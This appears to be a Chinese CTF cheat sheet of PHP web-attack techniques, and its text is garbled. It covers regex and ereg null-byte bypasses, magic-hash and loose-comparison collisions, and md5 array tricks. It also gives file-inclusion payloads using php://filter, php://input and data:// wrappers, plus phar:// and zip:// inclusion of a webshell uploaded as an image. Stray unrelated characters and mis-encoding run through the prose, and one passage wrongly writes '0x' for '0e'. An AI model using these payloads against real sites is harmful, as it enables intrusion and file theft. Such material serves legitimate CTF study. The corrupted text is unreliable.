正則表達(dá)式

preg_match
如果在進(jìn)行正則表達(dá)式匹配的時(shí)候喻圃，沒(méi)有限制字符串的開(kāi)始和結(jié)束(^ 和 $)蒋纬，則可以存在繞過(guò)的問(wèn)題

$ip = '1.1.1.1 abcd'; // 可以繞過(guò)
if(!preg_match("/(\d+)\.(\d+)\.(\d+)\.(\d+)/",$ip)) {
  die('error');
} else {
  // echo('key...')
}

ereg %00 截?cái)?br> ereg 讀到 %00 的時(shí)候猎荠，就截止了

<?php
    if (ereg ("^[a-zA-Z]+$", $_GET['a']) === FALSE)  {
        echo 'You password must be alphabet';
    }
?>

a=abcd%001234，可以繞過(guò)
ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE
字符串對(duì)比解析
在這里如果 $_GET[‘password’]為數(shù)組蜀备，則返回值為NULL
如果為123 || asd || 12as || 123%00&&&**关摇，則返回值為true
其余為false

字符串比較

<?php  
    echo 0 == 'a' ;// a 轉(zhuǎn)換為數(shù)字為 0    重點(diǎn)注意
    // 0x 開(kāi)頭會(huì)被當(dāng)成16進(jìn)制54975581388的16進(jìn)制為 0xccccccccc
    // 十六進(jìn)制與整數(shù)，被轉(zhuǎn)換為同一進(jìn)制比較
    '0xccccccccc' == '54975581388' ;

    // 字符串在與數(shù)字比較前會(huì)自動(dòng)轉(zhuǎn)換為數(shù)字碾阁，如果不能轉(zhuǎn)換為數(shù)字會(huì)變成0
    1 == '1';
    1 == '01';
    10 == '1e1';
    '100' == '1e2' ;    

    // 十六進(jìn)制數(shù)與帶空格十六進(jìn)制數(shù)输虱，被轉(zhuǎn)換為十六進(jìn)制整數(shù)
    '0xABCdef'  == '     0xABCdef';
    echo '0010e2' == '1e3';
    // 0e 開(kāi)頭會(huì)被當(dāng)成數(shù)字，又是等于 0*10^xxx=0
    // 如果 md5 是以 0e 開(kāi)頭脂凶，在做比較的時(shí)候宪睹，可以用這種方法繞過(guò)
    '0e509367213418206700842008763514' == '0e481036490867661113260034900752';
    '0e481036490867661113260034900752' == '0' ;

    var_dump(md5('240610708') == md5('QNKCDZO'));
    var_dump(md5('aabg7XSs') == md5('aabC9RqS'));
    var_dump(sha1('aaroZmOk') == sha1('aaK1STfY'));
    var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));
?>

文件包含

http://127.0.0.1/index.php?page=upload
這種 url 很容易就能想到可能是文件包含或者偽協(xié)議讀取
http://127.0.0.1/index.php?page=php://filter/read=convert.base64-encode/resource=upload

偽協(xié)議

php://filter

讀取文件

index.php?file=php://filter/convert.base64-encode/resource=flag.php
index.php?file=php://filter/read=convert.base64-encode/resource=flag.php

php://input

寫(xiě)入文件， 數(shù)據(jù)利用 POST 傳過(guò)去

index.php?file=php://input

data://

將 include 的文件流重定向到用戶控制的輸入流
test.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpO2V4aXQoKTsvLw==
可以用于控制 file_get_contents 的內(nèi)容為用戶輸入的流

$file=$_GET['file'];
$data = @file_get_contents($a,'r');
echo $data;

phar://

發(fā)現(xiàn)有一個(gè)文件上傳功能蚕钦，無(wú)法繞過(guò)亭病，僅能上傳jpg后綴的文件。與此同時(shí)嘶居，無(wú)法進(jìn)行文件包含截?cái)嘧锾llow_url_include=on 的狀態(tài)下，就可以考慮phar偽協(xié)議繞過(guò)食听。
寫(xiě)一個(gè)shell.php文件胸蛛，里面包含一句話木馬。然后樱报，壓縮成xxx.zip。然后改名為xxx.jpg進(jìn)行上傳泞当。最后使用phar進(jìn)行包含
這里的路徑為上傳的 jpg 文件在服務(wù)器的路徑
/index.php?id=phar://路徑/xxx.jpg/shell

zip://

上述 phar:// 的方法也可以使用 zip://
然后吧1.php文件壓縮成zip迹蛤，再把zip的后綴改為png，上傳上去襟士，并且可以獲得上傳上去的png的地址盗飒。
1.zip文件內(nèi)僅有1.php這個(gè)文件

/php?file=zip://1.png%231.php  
// 也可以嘗試不改名為png，直接使用zip上傳測(cè)試一下
/php?file=zip://1.zip%231.php

MD5 compare漏洞

PHP在處理哈希字符串時(shí)陋桂，如果利用”!=”或”==”來(lái)對(duì)哈希值進(jìn)行比較逆趣，它把每一個(gè)以”0x”開(kāi)頭的哈希值都解釋為科學(xué)計(jì)數(shù)法0的多少次方（為0），所以如果兩個(gè)不同的密碼經(jīng)過(guò)哈希以后嗜历，其哈希值都是以”0e”開(kāi)頭的宣渗，那么php將會(huì)認(rèn)為他們相同抖所。
常見(jiàn)的payload有

0x01 md5(str)
    QNKCDZO
    240610708
    s878926199a
    s155964671a
    s214587387a
    s214587387a
0x02 sha1(str)
    sha1('aaroZmOk')  
    sha1('aaK1STfY')
    sha1('aaO8zKZF')
    sha1('aa3OFF9m')

同時(shí)MD5不能處理數(shù)組，若有以下判斷則可用數(shù)組繞過(guò)

if(@md5($_GET['a']) == @md5($_GET['b']))
{
    echo "yes";
}
//http://127.0.0.1/1.php?a[]=1&b[]=2

變量覆蓋